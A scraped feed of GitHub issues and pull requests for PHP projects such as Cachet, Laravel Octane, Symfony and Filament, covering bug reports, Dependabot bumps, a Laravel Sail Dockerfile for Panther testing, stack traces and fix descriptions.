  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

29th Jun 2026 @ 12:42

hasPR

Why not use migrations to create the database, instead of relying on sqlite, so other RDBMS could be used

I will gladly make real migrations to use if needed

View more
12 comments
lsv

lsv

5th Apr 2018 @ 18:47

Fixes #1198

When a keyed collection (array<string, ChildData>) has array keys containing literal dots, validation reports the fields as missing. The static rules path added in #1043 builds the rule key from the raw array key, so key.with.dots gets treated as nested path segments (items.key.with.dots.string) instead of one key.

This escapes the dots in the collection key so the rule key becomes items.key\.with\.dots.string, matching how the dynamic Rule::forEach path already handles it.

View more
1 comment 🎉 1 🚀 1
lazerg

lazerg

6th Jul 2026 @ 14:23

No matter what I do, I can't seem to get the guy to boot up with an APP_KEY that it'll take with consistency.

docker-compose.yaml reads this, under the environment: - APP_KEY=odsoIqIptj9ADwVS9onivtmarnFKQhG3

This is what spits out in the run time logs:

Backup skipped!
Backup completed!
Application key [base64:vGSwhwLZjWiucsWF6jEyF6Mk/jgfNU0uAdK2Q1sTR4w=] set successfully.
Configuration cache cleared!
Configuration cached successfully!
Route cache cleared!

When I go into the deployment, and look at the .env file this is what I see set: APP_KEY="base64:oRx0GVFwZRvofbeo1Et/EoSCh+Fel+GQF3yUyGGbGYg="

No wonder when the app tries to start up it gives me this error:

[2020-06-26 02:14:47] production.ERROR: RuntimeException: No supported encrypter found. The cipher and / or key length are invalid. in /var/www/html/vendor/laravel/framework/src/Illuminate/Encryption/EncryptionServiceProvider.php:45

It's probably unable to find consistency in the values. cachet v2.3.18

View more
3 comments
DevMan01

DevMan01

26th Jun 2020 @ 02:27

I've been fighting all day with this and hope someone in the community can explain why this is such a huge hassle.

The official Laravel Sail dockerfile is built from Ubuntu, which I gather does not have an associated chromium and chromedriver available. I have tried including the command in the apt-get install, downloading a stable release from the Debian site (to get around the necessity of snap), and including Linux64 binaries directly. Docker has a variety of responses to my futile attempts, but the most common are "No release candidate available", "please install snap beforehand", and a rosetta error "failed to open elf at /lib64/ld-linux-x86-64.so.2" which I think indicates that I have a mismatch in the binary's architecture.

If you have any ideas for how to easily add the necessary chromedriver and chrome/chromium dependencies to get Panther to work, I'm open to any option at this point.

Dockerfile (copied from Laravel Sail official 8.3 runtime)


LABEL maintainer="Taylor Otwell"

ARG WWWUSER="sail"
ARG WWWGROUP="sail"
ARG NODE_VERSION=20
ARG MYSQL_CLIENT="mysql-client"
ARG POSTGRES_VERSION=15

WORKDIR /var/www/html

ENV DEBIAN_FRONTEND noninteractive
ENV TZ=UTC
ENV SUPERVISOR_PHP_COMMAND="/usr/bin/php -d variables_order=EGPCS /var/www/html/artisan serve --host=0.0.0.0 --port=80"
ENV SUPERVISOR_PHP_USER="sail"

RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone

RUN apt-get update \
    && mkdir -p /etc/apt/keyrings \
    && apt-get install -y gnupg gosu curl ca-certificates zip unzip git supervisor sqlite3 libcap2-bin libpng-dev python2 dnsutils librsvg2-bin fswatch ffmpeg nano  \
    && curl -sS 'https://keyserver.ubuntu.com/pks/lookup?op=get&search=0x14aa40ec0831756756d7f66c4f4ea0aae5267a6c' | gpg --dearmor | tee /etc/apt/keyrings/ppa_ondrej_php.gpg > /dev/null \
    && echo "deb [signed-by=/etc/apt/keyrings/ppa_ondrej_php.gpg] https://ppa.launchpadcontent.net/ondrej/php/ubuntu jammy main" > /etc/apt/sources.list.d/ppa_ondrej_php.list \
    && apt-get update \
    && apt-get install -y php8.3-cli php8.3-dev \
       php8.3-pgsql php8.3-sqlite3 php8.3-gd \
       php8.3-curl \
       php8.3-imap php8.3-mysql php8.3-mbstring \
       php8.3-xml php8.3-zip php8.3-bcmath php8.3-soap \
       php8.3-intl php8.3-readline \
       php8.3-ldap \
       php8.3-msgpack php8.3-igbinary php8.3-redis php8.3-swoole \
       php8.3-memcached php8.3-pcov php8.3-imagick php8.3-xdebug \
    && curl -sLS https://getcomposer.org/installer | php -- --install-dir=/usr/bin/ --filename=composer \
    && curl -fsSL https://deb.nodesource.com/gpgkey/nodesource-repo.gpg.key | gpg --dearmor -o /etc/apt/keyrings/nodesource.gpg \
    && echo "deb [signed-by=/etc/apt/keyrings/nodesource.gpg] https://deb.nodesource.com/node_$NODE_VERSION.x nodistro main" > /etc/apt/sources.list.d/nodesource.list \
    && apt-get update \
    && apt-get install -y nodejs \
    && npm install -g npm \
    && npm install -g pnpm \
    && npm install -g bun \
    && curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | gpg --dearmor | tee /etc/apt/keyrings/yarn.gpg >/dev/null \
    && echo "deb [signed-by=/etc/apt/keyrings/yarn.gpg] https://dl.yarnpkg.com/debian/ stable main" > /etc/apt/sources.list.d/yarn.list \
    && curl -sS https://www.postgresql.org/media/keys/ACCC4CF8.asc | gpg --dearmor | tee /etc/apt/keyrings/pgdg.gpg >/dev/null \
    && echo "deb [signed-by=/etc/apt/keyrings/pgdg.gpg] http://apt.postgresql.org/pub/repos/apt jammy-pgdg main" > /etc/apt/sources.list.d/pgdg.list \
    && apt-get update \
    && apt-get install -y yarn \
    && apt-get install -y $MYSQL_CLIENT \
    && apt-get install -y postgresql-client-$POSTGRES_VERSION \
    && apt-get install -y chromium-driver \
    && apt-get -y autoremove \
    && apt-get clean \
    && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*

RUN setcap "cap_net_bind_service=+ep" /usr/bin/php8.3
RUN groupadd -g 1000 ${WWWGROUP} \
    && useradd -u 1000 -g ${WWWGROUP} -m -s /bin/bash ${WWWUSER}

COPY start-container /usr/local/bin/start-container
COPY supervisord.conf /etc/supervisor/conf.d/supervisord.conf
COPY php.ini /etc/php/8.3/cli/conf.d/99-sail.ini
RUN chmod +x /usr/local/bin/start-container

EXPOSE 8000

ENTRYPOINT ["start-container"]

docker-compose.yml

    laravel.test:
        build:
            context: .
            dockerfile: Dockerfile
        image: custom-laravel-sail
        extra_hosts:
            - 'host.docker.internal:host-gateway'
        ports:
            - '${APP_PORT:-80}:80'
            - '${VITE_PORT:-5173}:${VITE_PORT:-5173}'
        environment:
            WWWUSER: '${WWWUSER}'
            WWWGROUP: '${WWWGROUP}'
            LARAVEL_SAIL: 1
            XDEBUG_MODE: '${SAIL_XDEBUG_MODE:-off}'
            XDEBUG_CONFIG: '${SAIL_XDEBUG_CONFIG:-client_host=host.docker.internal}'
            IGNITION_LOCAL_SITES_PATH: '${PWD}'
        volumes:
            - '.:/var/www/html'
        networks:
            - sail
        depends_on:
            - mysql
            - selenium
    mysql:
        image: 'mysql/mysql-server:8.0'
        ports:
            - '${FORWARD_DB_PORT:-3306}:3306'
        environment:
            MYSQL_ROOT_PASSWORD: '${DB_PASSWORD}'
            MYSQL_ROOT_HOST: '%'
            MYSQL_DATABASE: '${DB_DATABASE}'
            MYSQL_USER: '${DB_USERNAME}'
            MYSQL_PASSWORD: '${DB_PASSWORD}'
            MYSQL_ALLOW_EMPTY_PASSWORD: 1
        volumes:
            - 'sail-mysql:/var/lib/mysql'
            - './vendor/laravel/sail/database/mysql/create-testing-database.sh:/docker-entrypoint-initdb.d/10-create-testing-database.sh'
        networks:
            - sail
        healthcheck:
            test:
                - CMD
                - mysqladmin
                - ping
                - '-p${DB_PASSWORD}'
            retries: 3
            timeout: 5s
    selenium:
        image: 'seleniarm/standalone-chromium'
        extra_hosts:
            - 'host.docker.internal:host-gateway'
        volumes:
            - '/dev/shm:/dev/shm'
        networks:
            - sail
networks:
    sail:
        driver: bridge
volumes:
    sail-mysql:
        driver: local

start-container


if [ "$SUPERVISOR_PHP_USER" != "root" ] && [ "$SUPERVISOR_PHP_USER" != "sail" ]; then
    echo "You should set SUPERVISOR_PHP_USER to either 'sail' or 'root'."
    exit 1
fi

if [ ! -z "$WWWUSER" ]; then
    usermod -u $WWWUSER sail
fi

if [ ! -d /.composer ]; then
    mkdir /.composer
fi

chmod -R ugo+rw /.composer

if [ $# -gt 0 ]; then
    if [ "$SUPERVISOR_PHP_USER" = "root" ]; then
        exec "$@"
    else
        exec gosu $WWWUSER "$@"
    fi
else
    exec /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
fi

supervisord.conf

nodaemon=true
user=root
logfile=/var/log/supervisor/supervisord.log
pidfile=/var/run/supervisord.pid

[program:php]
command=%(ENV_SUPERVISOR_PHP_COMMAND)s
user=%(ENV_SUPERVISOR_PHP_USER)s
environment=LARAVEL_SAIL="1"
stdout_logfile=/dev/stdout
stdout_logfile_maxbytes=0
stderr_logfile=/dev/stderr
stderr_logfile_maxbytes=0
View more
2 comments
Dhermann27

Dhermann27

4th Jul 2024 @ 20:56

I keep entering my mail settings, but they just won't save. They revert back to normal as soon as i go off the page.

View more
1 comment
adambirds

adambirds

18th Mar 2021 @ 14:37

Using the Cachet v3, i noticed that you cannot add tags or meta info to a component with the POST method. I see this very useful, if you can do it, thanks.

View more
barduek

barduek

23rd Apr 2026 @ 19:28

Status: Needs Review

Claude-generated, I asked it to spot any gap.

View more
nicolas-grekas

nicolas-grekas

25th Mar 2026 @ 13:45

Bug Config Status: Needs Review
Q A
Branch? 6.4
Bug fix? yes
New feature? no
Deprecations? no
Issues Fix #64817
License MIT

ConfigBuilderGenerator inlines a node's info, @example, @default and @deprecated text into the generated /** ... */ docblock without escaping it. When any of those values contains a comment-closing sequence (*/) — e.g. a default cron expression such as */30 * * * *, or an info string mentioning one — the docblock is closed prematurely and the generated config-builder class becomes invalid PHP (fatal parse error).

How to reproduce

$treeBuilder->getRootNode()
    ->children()
        ->scalarNode('schedule')
            ->info('Cron expression, e.g. */30 * * * *')
            ->defaultValue('*/30 * * * *')
        ->end()
    ->end()
;

Before

The generated Config class contains a broken docblock (the */ inside @default ends the comment early, leaking the rest as PHP):

/**
 * Cron expression, e.g. */30 * * * *
 * @default '*/30 * * * *'
 * @param ParamConfigurator|scalar $value
 *
 * @return $this
 */
public function schedule($value): static

PHP Parse error: syntax error ...

After

The comment-closing sequence is escaped, so it can no longer terminate the docblock and the generated file is valid PHP:

/**
 * Cron expression, e.g. * /30 * * * *
 * @default '* /30 * * * *'
 * @param ParamConfigurator|scalar $value
 *
 * @return $this
 */
public function schedule($value): static

The fix lives in getComment(), the single place where the comment body is assembled. The generator never legitimately emits */ in its own annotations, so the change is safe and only affects the text of generated comments.

A regression test generates a builder from a node whose info/example/default contain */ and asserts the generated file parses as valid PHP.

View more
1 comment
sadiqk2

sadiqk2

10th Jul 2026 @ 11:48

This change is safe for backward compatibility.

View more
3 comments
Cosmologist

Cosmologist

29th Nov 2025 @ 18:39

  • added rector
  • added ruleset for laravel
  • using set code quality and dead code
View more
1 comment ❤️ 1
roberto-butti

roberto-butti

7th Jan 2025 @ 17:46

dependencies Status: Needs Review Minor javascript

Bumps the svelte group with 1 update: svelte.

Updates svelte from 5.55.7 to 5.56.4

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
  • @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
  • @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
  • @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
  • @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions
View more
dependabot[bot]

dependabot[bot]

3rd Jul 2026 @ 13:24

Laravel Version

12.58.0 and 13.9.0

PHP Version

8.5.6

Database Driver & Version

No response

Description

JsonApiResource has the includePreviouslyLoadedRelationships() method to always include relationships that have been eager loaded, as well as those listed in include, with the default being to not to.

However, any nested relations that have been eager loaded are always being included if the intermediate relation is included.

Steps To Reproduce

class Post extends Model {
  public function comments(): HasMany { return $this->hasMany(Comment::class); }
}

class Comment extends Model {
  public function author(): BelongsTo { return $this->belongsTo(User::class); }
}

class CommentResource extends JsonApiResource {
  public $relationships = ['author'];
}

class PostResource extends JsonApiResource {
  public $relationships = ['comments'];
}

Router::get('/api/post/{post}', fn (Post $post) => new PostResource($post->load('comments.author));

curl localhost/api/post/1?include=comments

The return includes the author objects, even though not requested.

View more
1 comment
simon-tma

simon-tma

14th May 2026 @ 06:05

needs more info

Octane Version

2.11.0

Laravel Version

10.48.29

PHP Version

8.2.5

What server type are you using?

Swoole

Server Version

5.1.1

Database Driver & Version

No response

Description

We verify client requests using the signature check middleware, which retrieves some of the signature information from the .env file via config. I recently added a command script, but I didn't restart Octane. After a while, all client requests were intercepted by the signature check middleware, and the link logs recorded in the middleware were no longer written to the logs and were completely lost. The logs are based on the Monolog buffer driver.

Steps To Reproduce

step1: Synchronize the latest code for an already running service without restarting the service

View more
4 comments
clemask

clemask

3rd Sep 2025 @ 06:09

What

phpstan-baseline.neon still carries an ignore entry for app/Filament/Resources/Courses/CommentResource.php, but that file has been deleted. PHPStan treats a baseline entry that no longer matches as an error (Ignored error pattern … was not matched in reported errors), which is why the phpstan job on main is red.

Fix

Remove the stale entry. It's the only change here (-6 lines, nothing else touched). After it, phpstan analyse comes back clean.

Safety

Pure dead-config removal: the referenced file is already gone, so nothing in the codebase relies on this baseline line. No app code, deps, or workflows changed.


Opened by Vemlor. We watch public CI, prep the fix, and send it as a ready-to-merge PR. Fully automated and unsolicited; close it with no hard feelings if you'd rather not. Happy to adjust anything.

View more
vemlor-bot

vemlor-bot

12th Jul 2026 @ 23:08

dependencies javascript

Bumps tar from 7.5.11 to 7.5.16.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.
View more
1 comment
dependabot[bot]

dependabot[bot]

22nd Jun 2026 @ 20:57

Hi,

I know Cachet 2.x is already discontinued before a 3.x release is available. I think this bug should be noted anyway.

I'm running v2.4.0-dev on a debian 12 system with apache2. I disabled the Allow people to signup to email notifications? setting.

This setting removed the "Subscribe" button from the main page, which links to https://status.domain.com/subscribe, but it does NOT disable the /subscribe endpoint itself.

Calling it directly still allows submitting an email address for subscribing, which resulted in a quite massive spam attempt on my status page.

View more
2 comments
frank42hh

frank42hh

12th Mar 2025 @ 09:58

When upgrading the container stops working. Did not see any changes in the changelog that might need configuration changes.

Here is a log of the console output:

172.31.19.170 - - [15/Jan/2021:08:17:34 +0000] "GET / HTTP/1.1" 500 581781 "-" "kube-probe/1.18+" "-"
2021/01/15 08:17:34 [error] 73#73: *9 FastCGI sent in stderr: "PHP message: [2021-01-15 08:17:34] production.ERROR: ErrorException: count(): Parameter must be an array or an object that implements Countable in /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php:1161
Stack trace:
#0 [internal function]: Illuminate\Foundation\Bootstrap\HandleExceptions->handleError(2, 'count(): Parame...', '/var/www/html/v...', 1161, Array)
#1 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(1161): count(NULL)
#2 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(1395): Illuminate\Database\Eloquent\Builder->callScope(Array, Array)
#3 [internal function]: Illuminate\Database\Eloquent\Builder->__call('notScheduled', Array)
#4 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Model.php(3505): call_user_func_array(Array, Array)
#5 [internal function]: Illuminate\Database\Eloquent\Model->__call('notScheduled', Array)
#6 /var/www/html/vendor/laravel/framework/src/" while reading response header from upstream, client: 172.31.19.170, server: localhost, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "172.31.16.158:8000"
2021/01/15 08:17:34 [warn] 73#73: *9 an upstream response is buffered to a temporary file /tmp/fastcgi/4/00/0000000004 while reading upstream, client: 172.31.19.170, server: localhost, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "172.31.16.158:8000"
[15-Jan-2021 08:17:57] WARNING: [pool www] child 84 said into stderr: "NOTICE: PHP message: [2021-01-15 08:17:57] production.ERROR: ErrorException: count(): Parameter must be an array or an object that implements Countable in /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php:1161"
[15-Jan-2021 08:17:57] WARNING: [pool www] child 84 said into stderr: "Stack trace:"
[15-Jan-2021 08:17:57] WARNING: [pool www] child 84 said into stderr: "#0 [internal function]: Illuminate\Foundation\Bootstrap\HandleExceptions->handleError(2, 'count(): Parame...', '/var/www/html/v...', 1161, Array)"
[15-Jan-2021 08:17:57] WARNING: [pool www] child 84 said into stderr: "#1 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(1161): count(NULL)"
[15-Jan-2021 08:17:57] WARNING: [pool www] child 84 said into stderr: "#2 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(1395): Illuminate\Database\Eloquent\Builder->callScope(Array, Array)"
[15-Jan-2021 08:17:57] WARNING: [pool www] child 84 said into stderr: "#3 [internal function]: Illuminate\Database\Eloquent\Builder->__call('notScheduled', Array)"
[15-Jan-2021 08:17:57] WARNING: [pool www] child 84 said into stderr: "#4 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Model.php(3505): call_user_func_array(Array, Array)"
[15-Jan-2021 08:17:57] WARNING: [pool www] child 84 said into stderr: "#5 [internal function]: Illuminate\Database\Eloquent\Model->__call('notScheduled', Array)"
[15-Jan-2021 08:17:57] WARNING: [pool www] child 84 said into stderr: "#6 /var/www/html/vendor/laravel/framework/src/..."
172.31.19.170 - - [15/Jan/2021:08:17:57 +0000] "GET / HTTP/1.1" 500 391646 "-" "kube-probe/1.18+" "-"
2021/01/15 08:17:57 [error] 73#73: *11 FastCGI sent in stderr: "PHP message: [2021-01-15 08:17:57] production.ERROR: ErrorException: count(): Parameter must be an array or an object that implements Countable in /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php:1161
Stack trace:
#0 [internal function]: Illuminate\Foundation\Bootstrap\HandleExceptions->handleError(2, 'count(): Parame...', '/var/www/html/v...', 1161, Array)
#1 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(1161): count(NULL)
#2 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(1395): Illuminate\Database\Eloquent\Builder->callScope(Array, Array)
#3 [internal function]: Illuminate\Database\Eloquent\Builder->__call('notScheduled', Array)
#4 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Model.php(3505): call_user_func_array(Array, Array)
#5 [internal function]: Illuminate\Database\Eloquent\Model->__call('notScheduled', Array)
#6 /var/www/html/vendor/laravel/framework/src/" while reading response header from upstream, client: 172.31.19.170, server: localhost, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "172.31.16.158:8000"
2021/01/15 08:17:57 [warn] 73#73: *11 an upstream response is buffered to a temporary file /tmp/fastcgi/5/00/0000000005 while reading upstream, client: 172.31.19.170, server: localhost, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "172.31.16.158:8000"
View more
3 comments
johan-smits

johan-smits

15th Jan 2021 @ 08:24

Octane Version

2.12.1

Laravel Version

12.26.4

PHP Version

8.4.0

What server type are you using?

Swoole

Server Version

6.0.2

Database Driver & Version

No response

Description

hi every time i change my code for a moment server crashes and i get this Error in the octane log thern after a few seconds it works normally Fatal error: Uncaught Error: Call to a member function handle() on null in /var/www/vendor/laravel/octane/bin/swoole-server:122 Stack trace: 2025-09-01 09:41:25.086 | #0 [internal function]: {closure:/var/www/vendor/laravel/octane/bin/swoole-server:111}(Object(Swoole\Http\Request), Object(Swoole\Http\Response)) 2025-09-01 09:41:25.086 | #1 {main} 2025-09-01 09:41:25.086 | thrown in /var/www/vendor/laravel/octane/bin/swoole-server on line 122 2025-09-01 09:41:26.684 | [2025-09-01 06:11:26] local.ERROR: Uncaught Error: Call to a member function handle() on null in /var/www/vendor/laravel/octane/bin/swoole-server:122 2025-09-01 09:41:26.684 | Stack trace: 2025-09-01 09:41:26.684 | #0 [internal function]: {closure:/var/www/vendor/laravel/octane/bin/swoole-server:111}(Object(Swoole\Http\Request), Object(Swoole\Http\Response)) 2025-09-01 09:41:26.684 | #1 {main} 2025-09-01 09:41:26.684 | thrown {"exception":"[object] (Symfony\\Component\\ErrorHandler\\Error\\FatalError(code: 0): Uncaught Error: Call to a member function handle() on null in /var/www/vendor/laravel/octane/bin/swoole-server:122 2025-09-01 09:41:26.684 | #0 [internal function]: {closure:/var/www/vendor/laravel/octane/bin/swoole-server:111}(Object(Swoole\\Http\\Request), Object(Swoole\\Http\\Response)) 2025-09-01 09:41:26.684 | thrown at /var/www/vendor/laravel/octane/bin/swoole-server:122) 2025-09-01 09:41:26.684 | [stacktrace] 2025-09-01 09:41:26.684 | #0 {main} 2025-09-01 09:41:26.684 | "}

Steps To Reproduce

change code (anywhare) then after try using it(Api requests..)

View more
2 comments
AbolfazlSalehi-Work

AbolfazlSalehi-Work

1st Sep 2025 @ 06:22

enhancement

Note: We are not looking for a community member to build this feature, it will be handled a member of the Filament core team when we have availability.

View more
2 comments 🎉 1 ❤️ 7 🚀 2
danharrin

danharrin

1st May 2026 @ 13:27

Process Status: Reviewed
View more
1 comment ❤️ 5 🚀 1
javiereguiluz

javiereguiluz

8th Jul 2026 @ 07:59

✏️ Describe the bug Adding multiple requiring rules to a property/parameter only results in the last added requiring rule being applied. For example, if a RequiredUnless rule is used alongside a RequiredWith rule, only the RequiredWith rule will be applied (assuming that the RequiredWith rule is last).

The offending lines seem to be: https://github.com/spatie/laravel-data/blob/324970e910414b92b43a239843efd06fa51090e9/src/Support/Validation/PropertyRules.php#L40-L44

↪️ To Reproduce


it('cannot add multiple requiring rules', function () {
    class BaseData extends Data
    {
        public function __construct(
            #[RequiredUnless('requires_a', false), RequiredWith('b')]
            public string $a,
            public string $b,
            public bool $requires_a,
        ) {
        }
    }

    dd(BaseData::getValidationRules([]));
});

✅ Expected behavior In the scenario above, I expect the a property to have the requiring rules ['required_unless:requires_a,false', 'required_with:b']. However, the a property only has the required_with:b. Laravel does offer the ability to apply multiple requiring rules at once, as demonstrated here:

Validator::make(
  [
    "a" => "a",
    "b" => "b",
    "requires_a" => false
  ],
  [
    "a" => ["required_unless:requires_a,false", "required_with:b"]
  ]
)->passes();
// Returns true

Validator::make(
  [
    "a" => "",
    "b" => "b",
    "requires_a" => true
  ],
  [
    "a" => ["required_unless:requires_a,false", "required_with:b"]
  ]
)->passes();
// Returns false (it's required with b AND requires_a is true)

Validator::make(
  [
    "a" => "",
    "b" => "b",
    "requires_a" => false,
  ],
  [
    "a" => ["required_unless:requires_a,false", "required_with:b"]
  ]
)->passes();
// Returns false (it's required with b)

Validator::make(
  [
    "a" => "",
    "b" => "",
    "requires_a" => true,
  ],
  [
    "a" => ["required_unless:requires_a,false", "required_with:b"]
  ]
)->passes();
// Returns false (requires_a is true)

Validator::make(
  [
    "a" => "",
    "b" => "",
    "requires_a" => false
  ],
  [
    "a" => ["required_unless:requires_a,false", "required_with:b"]
  ]
)->passes();
// Returns true

I expect requiring rules to be applied even if they are of the same type. The only requiring rule that I would expect to not be duplicated is the plain Required rule.

🖥️ Versions

Laravel: 10.x Laravel Data: 3.11.0 PHP: 8.1.15

View more
7 comments
striker4150

striker4150

24th Jan 2024 @ 21:11

I found that using AssetMapper create problems with panther because files are not served.

You can solve it by creating a router.php:

<?php

if (is_file($_SERVER['DOCUMENT_ROOT'].\DIRECTORY_SEPARATOR.$_SERVER['SCRIPT_NAME'])) {
    return false;
}

$script = 'index.php';

$_SERVER = array_merge($_SERVER, $_ENV);
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['DOCUMENT_ROOT'].\DIRECTORY_SEPARATOR.$script;

$_SERVER['SCRIPT_NAME'] = \DIRECTORY_SEPARATOR.$script;
$_SERVER['PHP_SELF'] = \DIRECTORY_SEPARATOR.$script;

require $script;

Should we document it?

Credits: https://symfonycasts.com/screencast/last-stack/testing

View more
❤️ 3
antoniovj1

antoniovj1

27th May 2024 @ 15:38

Hey together,

we have issues with the move forward and backward button, for the history, see screenshots.

{7D1B947D-4AF5-429C-BB4C-84BEA0051632} {65BE2378-B096-47D6-8A3E-EBC2C4FBD7FD}

Could you maybe assist here?

Thanks guys :)

View more
1 comment
FinneDEV

FinneDEV

26th Nov 2024 @ 19:48

bug

Contact Details

[email protected]

What happened?

Add a backup destination task. Have 2 remote servers. When creating the backup destination task select the second remote server. ReOpen the backup destination task the first remote server is selected. Also, when you set a password, the password is not mentioned in the input.

Version

v1.13.0 & v1.13.1

What browsers are you seeing the problem on?

Chrome

Relevant log output


View more
xfarret

xfarret

22nd Nov 2025 @ 16:59

help wanted
View more
7 comments
joedixon

joedixon

12th Oct 2021 @ 19:56

Q A
License MIT
Doc issue/PR #1524
View more
2 comments
jonathan-stimactiv

jonathan-stimactiv

25th Mar 2026 @ 10:35

Hi 👋🏻

I recently faced an issue when it comes to use the search form plugged to a LiveComponent, it seems that the LiveProp is not initialized:

Uncaught Error: The model name "query" was never initialized. Did you forget to expose "query" as a LiveProp? Available models values are: (none)
    at 928.0e3059b2.js:2:48118
    at y.set (928.0e3059b2.js:2:48330)
    at B.set (928.0e3059b2.js:2:57503)
    at t.updateModelFromElementEvent (928.0e3059b2.js:2:73943)
    at t.handleChangeEvent (928.0e3059b2.js:2:73359)
    at HTMLDivElement.callback (928.0e3059b2.js:2:70923)

The database is up, the assets are presents in public/build and the cache is cleared, here's the component (not modified):

<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <[email protected]>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace App\Twig\Components;

use App\Entity\Post;
use App\Repository\PostRepository;
use Symfony\UX\LiveComponent\Attribute\AsLiveComponent;
use Symfony\UX\LiveComponent\Attribute\LiveProp;
use Symfony\UX\LiveComponent\DefaultActionTrait;

/**
 * Live component to display instant search for Posts.
 *
 * See https://symfony.com/bundles/ux-live-component/current/index.html
 *
 * @author Romain Monteil <[email protected]>
 */
#[AsLiveComponent(name: 'blog_search')]
final class BlogSearchComponent
{
    use DefaultActionTrait;

    /**
     * Properties marked as LiveProp are stateful properties.
     * This means that each time the component is re-rendered, it will remember the original value of the property
     * and set it to the component object.
     *
     * By default, LiveProp are readonly. Making them writable allow users to change their value.
     *
     * See https://symfony.com/bundles/ux-live-component/current/index.html#liveprops-stateful-component-properties
     */
    #[LiveProp(writable: true)]
    public string $query = '';

    public function __construct(
        private readonly PostRepository $postRepository,
    ) {
    }

    /**
     * @return array<Post>
     */
    public function getPosts(): array
    {
        return $this->postRepository->findBySearchQuery($this->query);
    }
}

The project is fresh and just installed using symfony new --demo my_project.

Thanks again for the help and have a great day 🙂

PS: The issue seems related to 6.3 / 6.4 as I have the same project under 6.2 and it works perfectly.

View more
1 comment
Guikingone

Guikingone

29th Nov 2023 @ 07:53

Hi, Is there a Dockerfile or plans to add one for Cachet v3? Thanks

View more
1 comment 👍 13
andy-crain-kr

andy-crain-kr

28th Feb 2024 @ 18:22

Doctrine

In this section of the Symfony documentation: https://symfony.com/doc/current/doctrine/dbal.html#registering-custom-mapping-types-in-the-schematool the config

        doctrine:
            dbal:
                mapping_types:
                    enum: string

no longer works with Doctrine DBAL 4.x. With DBAL 4.x, mapping enum to string requires a length, otherwise migrations fails. (see also https://github.com/doctrine/dbal/issues/7036 )

Since Symfony users may still be on DBAL < 4, the example might still be relevant — but it would be helpful to add a note explaining the changed behavior in DBAL 4.x and the existence of the native enum type.

View more
2 comments
bt-nn

bt-nn

13th Apr 2026 @ 15:47

View more
Lea-Bar

Lea-Bar

15th Jun 2026 @ 14:24

Bug HttpKernel Status: Reviewed
Q A
Branch? 8.1
Bug fix? yes
New feature? no
Deprecations? no
Issues Fix #64773
License MIT

A form payload only ever holds strings, so RequestPayloadValueResolver already denormalizes it as csv to turn the type conversion on:

return $this->serializer->denormalize($data, $type, self::hasNonStringScalar($data) ? $format : 'csv', ...);

But mergeParamsAndFiles() puts the uploaded files into $data right before, and hasNonStringScalar() returns true for anything that is not a string — an UploadedFile included. So the payload looked like a typed one, the format stayed form, and the conversion never ran.

The consequence is the one reported in #64773: as soon as a file is actually uploaded, the int, bool and float properties of the DTO fail to denormalize.

class ProductDto
{
    public ?UploadedFile $image = null;
    public int $skuNumber = 0;
    public bool $published = false;
}

An object is not a scalar, so it must not be taken into account by hasNonStringScalar().

Why not add form to the converted formats

